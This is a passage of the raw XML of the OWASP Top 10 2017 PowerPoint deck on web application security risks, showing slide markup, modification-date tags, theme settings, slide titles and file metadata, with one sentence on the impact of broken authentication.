                        <a:t>attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers have to gain access to only a few accounts, or just one admin account to compromise the system. Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin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702140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03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.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1.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2.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3.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4.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5.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6.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7.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8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.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xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="OWASP Top 10-2017 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FEFFFF"/>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0365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3C752E"/>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7520</TotalTime>
  <Words>12260</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1297</Paragraphs>
  <Slides>26</Slides>
  <Notes>25</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Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Foreword</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks – 2017 </vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Broken Authentication</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>Broken Access Control</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Using Components  with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Insufficient Logging &amp; Monitoring</vt:lpstr>
      <vt:lpstr>What’s Next for Developers</vt:lpstr>
      <vt:lpstr>What’s Next for Security Testers</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>What’s Next for Application  Managers</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors</vt:lpstr>
      <vt:lpstr>Methodology and Data</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP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 10 - 2017</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>office@enil.us</cp:lastModifiedBy>
  <cp:revision>1857</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-19T20:03:45Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>